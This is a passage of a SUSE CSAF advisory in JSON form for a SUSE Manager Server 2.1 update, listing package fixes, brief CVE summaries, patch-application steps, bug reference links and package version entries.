cloned\n channels. (bsc#913939)\n * Fixed uncaught error which prevent correct error handling.\n (bsc#858971)\n * Fix NPE by setting max_members to 0 instead of NULL. (bsc#912035)\n * Fix more cross-site-scripting (XSS) issues. (CVE-2014-7811,\n bsc#902915)\n * Fix basic authentication for HTTP proxies. (bsc#912057)\n * Accept repos with same SCC ID and different URLs. (bsc#911808)\n * Avoid mgr-sync-refresh failure because clear_log_id was not called.\n (bsc#911166)\n * Fix cross-site-scripting (XSS) issue in system-group (CVE-2014-7812,\n bsc#912886)\n * Fix \u0027Select All\u0027 buttons display on rhn:list and make it consistent\n with new rl:list. (bsc#909724)\n * Fix List tag missing submit parameter for \u0027Select All\u0027 and others.\n (bnc#909724)\n * Sort filelist in configfile.compare event history alphabetically.\n (bsc#910243)\n * Allow parenthesis in system group description. (bsc#903064)\n * Provide new API documentation in PDF format. (bsc#896029)\n * Update the example scripts section. (bsc#896029)\n * Fixed wording issues on package lock page. (bsc#880022)\n * Make text more clear for package profile sync. (bsc#884350)\n\nspacewalk-reports:\n\n * Added channel- and server-group-ids to activation-keys.\n * Added spacewalk-report for systems with extra packages.\n\nspacewalk-search:\n\n * Fix package searching in shared channels.\n\nspacewalk-setup:\n\n * Setup /etc/sudoers in SUSE Manager upgrade scripts (bnc#881711)\n * No activation if database population should be skipped. (bsc#900956)\n * Do not enable spacewalk-service in runlevel 4. (bsc#879992)\n\nspacewalk-utils:\n\n * Fixed spacewalk-hostname-rename to work with PostgreSQL backend.\n * Added limitation of spacewalk-clone-by-date for RHEL4 and earlier.\n * Add openSUSE 13.2 repositories to spacewalk-common-channels.\n * Improve clone-by-date dependency resolution.\n * Add CentOS 7 and EPEL 7 channels.\n * Fix error if blacklist / removelist is not in scbd configurationfile.\n\nspacewalk-web:\n\n * Fix links to monitoring documentation. (bsc#906887)\n * Show Proxy tab if system is a proxy even when assigned to cloned\n channels. (bsc#913939)\n\nsupportutils-plugin-susemanager:\n\n * Write current service and repository configuration into\n supportconfig.\n\nsusemanager-manuals_en, susemanager-jsp_en:\n\n * Clarification about supported Web browsers. (bsc#889905)\n * Update text and image files. (bnc#907527)\n * Document NCC to SCC switch with SUSE Manager 2.1. (bnc#907106,\n bnc#907643, bnc#907645, bnc#907646)\n * SUSE Manager server update description. (bnc#902373)\n * Activation keys and packages. (bnc#767279)\n * Cobbler (bnc#880027), Link fix (bnc#881225), Wagon (bnc#884366)\n * Install and ship the built PDFs. (bnc#907086)\n * Update text and image files (bsc#910494).\n * Firewall rules are incomplete - ssh-push and ssh-push-tunnel settings\n missing. (bsc#904703)\n * Document SP migration and ISS. (bsc#913215, partially).\n * Fix \u0027beta packages\u0027 mentioned in documentation. (bsc#886421).\n * User guide: Snapshots: clarify snaphot usage. (bsc#906851).\n * Document maximal supported configuration file limit. (bsc#910482).\n\nsusemanager-schema:\n\n * Add SLE 12 distribution targets to database.\n * Fix evr_t schema upgrade. (bsc#881111)\n * Allow evr_t to be compared with NULL in Oracle. (bsc#881111)\n * Add support to ppc64le architecture.\n * Fix migration script names to fix bare-metal registration.\n (bsc#896109)\n * Create regular index instead and have one migration per DB.\n (bsc#905072)\n * Drop unique index on package ids. (bsc#905072)\n * Fix NPE by setting max_members to 0 instead of NULL. (bsc#912035)\n * Fix old migration for future reference. (bsc#911180)\n * Avoid NPE when migrating to SCC on Oracle migrated from 1.7.\n (bsc#911180)\n\nsusemanager:\n\n * Update the sudoers file after SUSE Manager upgrade. (bnc#881711)\n * Fix oracle2postgres.sh (database configuration).\n * Replace /etc/motd after setup. (bsc#883379)\n * Make mgr-create-bootstrap-repo SCC and SLE 12 aware.\n * Abort setup when invalid SSL country code given. (bnc#882468)\n * Use noRepoSync parameter always.\n * Fixed error message on exception in mgr-sync. (bnc#905263)\n * Fixed add product to not trigger redundant addition of base channel.\n (bnc#901928)\n * Ask for the authentication beforehand. (bsc#908317)\n\nsusemanager-sync-data:\n\n * Add channels for Public Cloud Module. (bsc#907586)\n * Add new channel families SLE-WE and SLE-LP.\n * Add ATI and nVidia channels for SLED11-SP3. (bsc#901108)\n * Add channels for IBM-DLPAR for SLE12 ppc64le.\n * Added support for RES7 in SUSE Manager. (bsc#897723, bsc#893608)\n\nsuseRegisterInfo:\n\n * Re-add legacy suse_register_info to successfully perform the update.\n (bsc#898428)\n\nzypp-plugin-spacewalk:\n\n * Check for retrieveOnly option in up2date configuration and set\n download_only. (bsc#896254)\n * Changed the spec file to force usage of the official python VM.\n (bsc#889363)\n\nyum:\n\n * Preserve query parameters in URLs. (bsc#896844)\n\nstruts:\n\n * CVE-2014-0114: The ActionForm object in Apache Struts 1.x through\n 1.3.10 allows remote attackers to \u0027manipulate\u0027 the ClassLoader and\n execute arbitrary code via the class parameter, which is passed to\n the getClass method.\n\napache2-mod_wsgi:\n\n * CVE-2014-0242: Information exposure. (bnc#878553)\n * CVE-2014-0240: Local privilege escalation. (bnc#878550)\n * CVE-2014-8583: Failure to handle errors when attempting to drop group\n privileges. (bnc#903961)\n\nlibyaml-0-2:\n\n * Assert failure when processing wrapped strings (bnc#907809,\n CVE-2014-9130)\n\ntanukiwrapper:\n\n * Allow more than 4G as -Xmx option. (bsc#914900)\n\nThe following new packages have been added to the product: \nsusemanager-sync-data, google-gson, python-enum34.\n\nHow to apply this update:\n\n 1. Log in as root user to the SUSE Manager server.\n 2. Stop the Spacewalk service: spacewalk-service stop\n 3. Apply the patch using either zypper patch or YaST Online Update.\n 4. Upgrade the database schema with spacewalk-schema-upgrade\n 5. Start the Spacewalk service: spacewalk-service start\n\nSecurity Issues:\n\n * CVE-2014-0114\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\u003e\n * CVE-2014-0240\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0240\u003e\n * CVE-2014-0242\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0242\u003e\n * CVE-2014-3654\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3654\u003e\n * CVE-2014-7811\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7811\u003e\n * CVE-2014-7812\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7812\u003e\n * CVE-2014-8583\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8583\u003e\n * CVE-2014-9130\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9130\u003e\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "sleman21-suse-manager-201503",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-ru-2015_0611-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-RU-2015:0611-1",
"url": "https://www.suse.com/support/update/announcement//suse-ru-20150611-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-RU-2015:0611-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2015-March/002829.html"
},
{
"category": "self",
"summary": "SUSE Bug 653265",
"url": "https://bugzilla.suse.com/653265"
},
{
"category": "self",
"summary": "SUSE Bug 767279",
"url": "https://bugzilla.suse.com/767279"
},
{
"category": "self",
"summary": "SUSE Bug 808947",
"url": "https://bugzilla.suse.com/808947"
},
{
"category": "self",
"summary": "SUSE Bug 841731",
"url": "https://bugzilla.suse.com/841731"
},
{
"category": "self",
"summary": "SUSE Bug 855389",
"url": "https://bugzilla.suse.com/855389"
},
{
"category": "self",
"summary": "SUSE Bug 858971",
"url": "https://bugzilla.suse.com/858971"
},
{
"category": "self",
"summary": "SUSE Bug 860299",
"url": "https://bugzilla.suse.com/860299"
},
{
"category": "self",
"summary": "SUSE Bug 862408",
"url": "https://bugzilla.suse.com/862408"
},
{
"category": "self",
"summary": "SUSE Bug 867836",
"url": "https://bugzilla.suse.com/867836"
},
{
"category": "self",
"summary": "SUSE Bug 870159",
"url": "https://bugzilla.suse.com/870159"
},
{
"category": "self",
"summary": "SUSE Bug 872029",
"url": "https://bugzilla.suse.com/872029"
},
{
"category": "self",
"summary": "SUSE Bug 872298",
"url": "https://bugzilla.suse.com/872298"
},
{
"category": "self",
"summary": "SUSE Bug 872351",
"url": "https://bugzilla.suse.com/872351"
},
{
"category": "self",
"summary": "SUSE Bug 875231",
"url": "https://bugzilla.suse.com/875231"
},
{
"category": "self",
"summary": "SUSE Bug 875452",
"url": "https://bugzilla.suse.com/875452"
},
{
"category": "self",
"summary": "SUSE Bug 878550",
"url": "https://bugzilla.suse.com/878550"
},
{
"category": "self",
"summary": "SUSE Bug 878553",
"url": "https://bugzilla.suse.com/878553"
},
{
"category": "self",
"summary": "SUSE Bug 879904",
"url": "https://bugzilla.suse.com/879904"
},
{
"category": "self",
"summary": "SUSE Bug 879992",
"url": "https://bugzilla.suse.com/879992"
},
{
"category": "self",
"summary": "SUSE Bug 879998",
"url": "https://bugzilla.suse.com/879998"
},
{
"category": "self",
"summary": "SUSE Bug 880001",
"url": "https://bugzilla.suse.com/880001"
},
{
"category": "self",
"summary": "SUSE Bug 880022",
"url": "https://bugzilla.suse.com/880022"
},
{
"category": "self",
"summary": "SUSE Bug 880026",
"url": "https://bugzilla.suse.com/880026"
},
{
"category": "self",
"summary": "SUSE Bug 880027",
"url": "https://bugzilla.suse.com/880027"
},
{
"category": "self",
"summary": "SUSE Bug 880081",
"url": "https://bugzilla.suse.com/880081"
},
{
"category": "self",
"summary": "SUSE Bug 880087",
"url": "https://bugzilla.suse.com/880087"
},
{
"category": "self",
"summary": "SUSE Bug 880327",
"url": "https://bugzilla.suse.com/880327"
},
{
"category": "self",
"summary": "SUSE Bug 880388",
"url": "https://bugzilla.suse.com/880388"
},
{
"category": "self",
"summary": "SUSE Bug 880936",
"url": "https://bugzilla.suse.com/880936"
},
{
"category": "self",
"summary": "SUSE Bug 881111",
"url": "https://bugzilla.suse.com/881111"
},
{
"category": "self",
"summary": "SUSE Bug 881225",
"url": "https://bugzilla.suse.com/881225"
},
{
"category": "self",
"summary": "SUSE Bug 881522",
"url": "https://bugzilla.suse.com/881522"
},
{
"category": "self",
"summary": "SUSE Bug 881711",
"url": "https://bugzilla.suse.com/881711"
},
{
"category": "self",
"summary": "SUSE Bug 882468",
"url": "https://bugzilla.suse.com/882468"
},
{
"category": "self",
"summary": "SUSE Bug 883009",
"url": "https://bugzilla.suse.com/883009"
},
{
"category": "self",
"summary": "SUSE Bug 883057",
"url": "https://bugzilla.suse.com/883057"
},
{
"category": "self",
"summary": "SUSE Bug 883379",
"url": "https://bugzilla.suse.com/883379"
},
{
"category": "self",
"summary": "SUSE Bug 883487",
"url": "https://bugzilla.suse.com/883487"
},
{
"category": "self",
"summary": "SUSE Bug 884051",
"url": "https://bugzilla.suse.com/884051"
},
{
"category": "self",
"summary": "SUSE Bug 884081",
"url": "https://bugzilla.suse.com/884081"
},
{
"category": "self",
"summary": "SUSE Bug 884350",
"url": "https://bugzilla.suse.com/884350"
},
{
"category": "self",
"summary": "SUSE Bug 884366",
"url": "https://bugzilla.suse.com/884366"
},
{
"category": "self",
"summary": "SUSE Bug 885889",
"url": "https://bugzilla.suse.com/885889"
},
{
"category": "self",
"summary": "SUSE Bug 886391",
"url": "https://bugzilla.suse.com/886391"
},
{
"category": "self",
"summary": "SUSE Bug 886421",
"url": "https://bugzilla.suse.com/886421"
},
{
"category": "self",
"summary": "SUSE Bug 887538",
"url": "https://bugzilla.suse.com/887538"
},
{
"category": "self",
"summary": "SUSE Bug 887879",
"url": "https://bugzilla.suse.com/887879"
},
{
"category": "self",
"summary": "SUSE Bug 889363",
"url": "https://bugzilla.suse.com/889363"
},
{
"category": "self",
"summary": "SUSE Bug 889605",
"url": "https://bugzilla.suse.com/889605"
},
{
"category": "self",
"summary": "SUSE Bug 889721",
"url": "https://bugzilla.suse.com/889721"
},
{
"category": "self",
"summary": "SUSE Bug 889739",
"url": "https://bugzilla.suse.com/889739"
},
{
"category": "self",
"summary": "SUSE Bug 889905",
"url": "https://bugzilla.suse.com/889905"
},
{
"category": "self",
"summary": "SUSE Bug 892707",
"url": "https://bugzilla.suse.com/892707"
},
{
"category": "self",
"summary": "SUSE Bug 892711",
"url": "https://bugzilla.suse.com/892711"
},
{
"category": "self",
"summary": "SUSE Bug 893608",
"url": "https://bugzilla.suse.com/893608"
},
{
"category": "self",
"summary": "SUSE Bug 895001",
"url": "https://bugzilla.suse.com/895001"
},
{
"category": "self",
"summary": "SUSE Bug 895961",
"url": "https://bugzilla.suse.com/895961"
},
{
"category": "self",
"summary": "SUSE Bug 896029",
"url": "https://bugzilla.suse.com/896029"
},
{
"category": "self",
"summary": "SUSE Bug 896109",
"url": "https://bugzilla.suse.com/896109"
},
{
"category": "self",
"summary": "SUSE Bug 896238",
"url": "https://bugzilla.suse.com/896238"
},
{
"category": "self",
"summary": "SUSE Bug 896244",
"url": "https://bugzilla.suse.com/896244"
},
{
"category": "self",
"summary": "SUSE Bug 896254",
"url": "https://bugzilla.suse.com/896254"
},
{
"category": "self",
"summary": "SUSE Bug 896844",
"url": "https://bugzilla.suse.com/896844"
},
{
"category": "self",
"summary": "SUSE Bug 897723",
"url": "https://bugzilla.suse.com/897723"
},
{
"category": "self",
"summary": "SUSE Bug 898242",
"url": "https://bugzilla.suse.com/898242"
},
{
"category": "self",
"summary": "SUSE Bug 898426",
"url": "https://bugzilla.suse.com/898426"
},
{
"category": "self",
"summary": "SUSE Bug 898428",
"url": "https://bugzilla.suse.com/898428"
},
{
"category": "self",
"summary": "SUSE Bug 899266",
"url": "https://bugzilla.suse.com/899266"
},
{
"category": "self",
"summary": "SUSE Bug 900956",
"url": "https://bugzilla.suse.com/900956"
},
{
"category": "self",
"summary": "SUSE Bug 901058",
"url": "https://bugzilla.suse.com/901058"
},
{
"category": "self",
"summary": "SUSE Bug 901108",
"url": "https://bugzilla.suse.com/901108"
},
{
"category": "self",
"summary": "SUSE Bug 901193",
"url": "https://bugzilla.suse.com/901193"
},
{
"category": "self",
"summary": "SUSE Bug 901675",
"url": "https://bugzilla.suse.com/901675"
},
{
"category": "self",
"summary": "SUSE Bug 901776",
"url": "https://bugzilla.suse.com/901776"
},
{
"category": "self",
"summary": "SUSE Bug 901927",
"url": "https://bugzilla.suse.com/901927"
},
{
"category": "self",
"summary": "SUSE Bug 901928",
"url": "https://bugzilla.suse.com/901928"
},
{
"category": "self",
"summary": "SUSE Bug 901958",
"url": "https://bugzilla.suse.com/901958"
},
{
"category": "self",
"summary": "SUSE Bug 902182",
"url": "https://bugzilla.suse.com/902182"
},
{
"category": "self",
"summary": "SUSE Bug 902373",
"url": "https://bugzilla.suse.com/902373"
},
{
"category": "self",
"summary": "SUSE Bug 902494",
"url": "https://bugzilla.suse.com/902494"
},
{
"category": "self",
"summary": "SUSE Bug 902503",
"url": "https://bugzilla.suse.com/902503"
},
{
"category": "self",
"summary": "SUSE Bug 902915",
"url": "https://bugzilla.suse.com/902915"
},
{
"category": "self",
"summary": "SUSE Bug 903064",
"url": "https://bugzilla.suse.com/903064"
},
{
"category": "self",
"summary": "SUSE Bug 903720",
"url": "https://bugzilla.suse.com/903720"
},
{
"category": "self",
"summary": "SUSE Bug 903723",
"url": "https://bugzilla.suse.com/903723"
},
{
"category": "self",
"summary": "SUSE Bug 903880",
"url": "https://bugzilla.suse.com/903880"
},
{
"category": "self",
"summary": "SUSE Bug 903961",
"url": "https://bugzilla.suse.com/903961"
},
{
"category": "self",
"summary": "SUSE Bug 904690",
"url": "https://bugzilla.suse.com/904690"
},
{
"category": "self",
"summary": "SUSE Bug 904699",
"url": "https://bugzilla.suse.com/904699"
},
{
"category": "self",
"summary": "SUSE Bug 904703",
"url": "https://bugzilla.suse.com/904703"
},
{
"category": "self",
"summary": "SUSE Bug 904732",
"url": "https://bugzilla.suse.com/904732"
},
{
"category": "self",
"summary": "SUSE Bug 904841",
"url": "https://bugzilla.suse.com/904841"
},
{
"category": "self",
"summary": "SUSE Bug 904959",
"url": "https://bugzilla.suse.com/904959"
},
{
"category": "self",
"summary": "SUSE Bug 905072",
"url": "https://bugzilla.suse.com/905072"
},
{
"category": "self",
"summary": "SUSE Bug 905263",
"url": "https://bugzilla.suse.com/905263"
},
{
"category": "self",
"summary": "SUSE Bug 905530",
"url": "https://bugzilla.suse.com/905530"
},
{
"category": "self",
"summary": "SUSE Bug 906850",
"url": "https://bugzilla.suse.com/906850"
},
{
"category": "self",
"summary": "SUSE Bug 906851",
"url": "https://bugzilla.suse.com/906851"
},
{
"category": "self",
"summary": "SUSE Bug 906887",
"url": "https://bugzilla.suse.com/906887"
},
{
"category": "self",
"summary": "SUSE Bug 907086",
"url": "https://bugzilla.suse.com/907086"
},
{
"category": "self",
"summary": "SUSE Bug 907106",
"url": "https://bugzilla.suse.com/907106"
},
{
"category": "self",
"summary": "SUSE Bug 907337",
"url": "https://bugzilla.suse.com/907337"
},
{
"category": "self",
"summary": "SUSE Bug 907527",
"url": "https://bugzilla.suse.com/907527"
},
{
"category": "self",
"summary": "SUSE Bug 907586",
"url": "https://bugzilla.suse.com/907586"
},
{
"category": "self",
"summary": "SUSE Bug 907643",
"url": "https://bugzilla.suse.com/907643"
},
{
"category": "self",
"summary": "SUSE Bug 907645",
"url": "https://bugzilla.suse.com/907645"
},
{
"category": "self",
"summary": "SUSE Bug 907646",
"url": "https://bugzilla.suse.com/907646"
},
{
"category": "self",
"summary": "SUSE Bug 907677",
"url": "https://bugzilla.suse.com/907677"
},
{
"category": "self",
"summary": "SUSE Bug 907809",
"url": "https://bugzilla.suse.com/907809"
},
{
"category": "self",
"summary": "SUSE Bug 908317",
"url": "https://bugzilla.suse.com/908317"
},
{
"category": "self",
"summary": "SUSE Bug 908320",
"url": "https://bugzilla.suse.com/908320"
},
{
"category": "self",
"summary": "SUSE Bug 908849",
"url": "https://bugzilla.suse.com/908849"
},
{
"category": "self",
"summary": "SUSE Bug 909724",
"url": "https://bugzilla.suse.com/909724"
},
{
"category": "self",
"summary": "SUSE Bug 910243",
"url": "https://bugzilla.suse.com/910243"
},
{
"category": "self",
"summary": "SUSE Bug 910482",
"url": "https://bugzilla.suse.com/910482"
},
{
"category": "self",
"summary": "SUSE Bug 910494",
"url": "https://bugzilla.suse.com/910494"
},
{
"category": "self",
"summary": "SUSE Bug 911166",
"url": "https://bugzilla.suse.com/911166"
},
{
"category": "self",
"summary": "SUSE Bug 911180",
"url": "https://bugzilla.suse.com/911180"
},
{
"category": "self",
"summary": "SUSE Bug 911272",
"url": "https://bugzilla.suse.com/911272"
},
{
"category": "self",
"summary": "SUSE Bug 911808",
"url": "https://bugzilla.suse.com/911808"
},
{
"category": "self",
"summary": "SUSE Bug 912035",
"url": "https://bugzilla.suse.com/912035"
},
{
"category": "self",
"summary": "SUSE Bug 912057",
"url": "https://bugzilla.suse.com/912057"
},
{
"category": "self",
"summary": "SUSE Bug 912886",
"url": "https://bugzilla.suse.com/912886"
},
{
"category": "self",
"summary": "SUSE Bug 913215",
"url": "https://bugzilla.suse.com/913215"
},
{
"category": "self",
"summary": "SUSE Bug 913221",
"url": "https://bugzilla.suse.com/913221"
},
{
"category": "self",
"summary": "SUSE Bug 913939",
"url": "https://bugzilla.suse.com/913939"
},
{
"category": "self",
"summary": "SUSE Bug 914260",
"url": "https://bugzilla.suse.com/914260"
},
{
"category": "self",
"summary": "SUSE Bug 914437",
"url": "https://bugzilla.suse.com/914437"
},
{
"category": "self",
"summary": "SUSE Bug 914900",
"url": "https://bugzilla.suse.com/914900"
},
{
"category": "self",
"summary": "SUSE Bug 915140",
"url": "https://bugzilla.suse.com/915140"
},
{
"category": "self",
"summary": "SUSE Bug 919448",
"url": "https://bugzilla.suse.com/919448"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2014-0114 page",
"url": "https://www.suse.com/security/cve/CVE-2014-0114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2014-0240 page",
"url": "https://www.suse.com/security/cve/CVE-2014-0240/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2014-0242 page",
"url": "https://www.suse.com/security/cve/CVE-2014-0242/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2014-3654 page",
"url": "https://www.suse.com/security/cve/CVE-2014-3654/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2014-7811 page",
"url": "https://www.suse.com/security/cve/CVE-2014-7811/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2014-7812 page",
"url": "https://www.suse.com/security/cve/CVE-2014-7812/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2014-8583 page",
"url": "https://www.suse.com/security/cve/CVE-2014-8583/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2014-9130 page",
"url": "https://www.suse.com/security/cve/CVE-2014-9130/"
}
],
"title": "Recommended update for SUSE Manager Server 2.1",
"tracking": {
"current_release_date": "2015-02-25T20:05:05Z",
"generator": {
"date": "2015-02-25T20:05:05Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-RU-2015:0611-1",
"initial_release_date": "2015-02-25T20:05:05Z",
"revision_history": [
{
"date": "2015-02-25T20:05:05Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product": {
"name": "auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product_id": "auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
}
},
{
"category": "product_version",
"name": "auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product": {
"name": "auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product_id": "auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
}
},
{
"category": "product_version",
"name": "auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product": {
"name": "auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product_id": "auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
}
},
{
"category": "product_version",
"name": "auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product": {
"name": "auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product_id": "auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
}
},
{
"category": "product_version",
"name": "auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product": {
"name": "auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product_id": "auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
}
},
{
"category": "product_version",
"name": "google-gson-2.2.4-0.7.52.noarch",
"product": {
"name": "google-gson-2.2.4-0.7.52.noarch",
"product_id": "google-gson-2.2.4-0.7.52.noarch"
}
},
{
"category": "product_version",
"name": "oracle-config-1.1-0.10.10.16.noarch",
"product": {
"name": "oracle-config-1.1-0.10.10.16.noarch",
"product_id": "oracle-config-1.1-0.10.10.16.noarch"
}
},
{
"category": "product_version",
"name": "osa-dispatcher-5.11.33.7-0.7.16.noarch",
"product": {
"name": "osa-dispatcher-5.11.33.7-0.7.16.noarch",
"product_id": "osa-dispatcher-5.11.33.7-0.7.16.noarch"
}
},
{
"category": "product_version",
"name": "perl-Class-Singleton-1.4-4.13.38.noarch",
"product": {
"name": "perl-Class-Singleton-1.4-4.13.38.noarch",
"product_id": "perl-Class-Singleton-1.4-4.13.38.noarch"
}
},
{
"category": "product_version",
"name": "perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"product": {
"name": "perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"product_id": "perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch"
}
},
{
"category": "product_version",
"name": "perl-Satcon-1.20.2-0.7.6.noarch",
"product": {
"name": "perl-Satcon-1.20.2-0.7.6.noarch",
"product_id": "perl-Satcon-1.20.2-0.7.6.noarch"
}
},
{
"category": "product_version",
"name": "perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product": {
"name": "perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"product_id": "perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch"
}
},
{
"category": "product_version",
"name": "pxe-default-image-0.1-0.20.56.noarch",
"product": {
"name": "pxe-default-image-0.1-0.20.56.noarch",
"product_id": "pxe-default-image-0.1-0.20.56.noarch"
}
},
{
"category": "product_version",
"name": "rhn-custom-info-5.4.22.6-0.7.13.noarch",
"product": {
"name": "rhn-custom-info-5.4.22.6-0.7.13.noarch",
"product_id": "rhn-custom-info-5.4.22.6-0.7.13.noarch"
}
},
{
"category": "product_version",
"name": "rhnmd-5.3.18.4-0.7.15.noarch",
"product": {
"name": "rhnmd-5.3.18.4-0.7.15.noarch",
"product_id": "rhnmd-5.3.18.4-0.7.15.noarch"
}
},
{
"category": "product_version",
"name": "rhnpush-5.5.71.7-0.7.16.noarch",
"product": {
"name": "rhnpush-5.5.71.7-0.7.16.noarch",
"product_id": "rhnpush-5.5.71.7-0.7.16.noarch"
}
},
{
"category": "product_version",
"name": "sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"product": {
"name": "sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"product_id": "sm-ncc-sync-data-2.1.9-0.7.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-admin-2.1.2.4-0.7.6.noarch",
"product": {
"name": "spacewalk-admin-2.1.2.4-0.7.6.noarch",
"product_id": "spacewalk-admin-2.1.2.4-0.7.6.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-base-2.1.60.12-0.7.7.noarch",
"product": {
"name": "spacewalk-base-2.1.60.12-0.7.7.noarch",
"product_id": "spacewalk-base-2.1.60.12-0.7.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"product": {
"name": "spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"product_id": "spacewalk-base-minimal-2.1.60.12-0.7.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"product": {
"name": "spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"product_id": "spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"product": {
"name": "spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"product_id": "spacewalk-certs-tools-2.1.6.5-0.7.10.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-check-2.1.16.6-0.7.9.noarch",
"product": {
"name": "spacewalk-check-2.1.16.6-0.7.9.noarch",
"product_id": "spacewalk-check-2.1.16.6-0.7.9.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"product": {
"name": "spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"product_id": "spacewalk-client-setup-2.1.16.6-0.7.9.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"product": {
"name": "spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"product_id": "spacewalk-client-tools-2.1.16.6-0.7.9.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-config-2.1.5.4-0.7.15.noarch",
"product": {
"name": "spacewalk-config-2.1.5.4-0.7.15.noarch",
"product_id": "spacewalk-config-2.1.5.4-0.7.15.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"product": {
"name": "spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"product_id": "spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-grail-2.1.60.12-0.7.7.noarch",
"product": {
"name": "spacewalk-grail-2.1.60.12-0.7.7.noarch",
"product_id": "spacewalk-grail-2.1.60.12-0.7.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-html-2.1.60.12-0.7.7.noarch",
"product": {
"name": "spacewalk-html-2.1.60.12-0.7.7.noarch",
"product_id": "spacewalk-html-2.1.60.12-0.7.7.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-2.1.165.14-0.7.16.noarch",
"product": {
"name": "spacewalk-java-2.1.165.14-0.7.16.noarch",
"product_id": "spacewalk-java-2.1.165.14-0.7.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"product": {
"name": "spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"product_id": "spacewalk-java-config-2.1.165.14-0.7.16.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"product": {
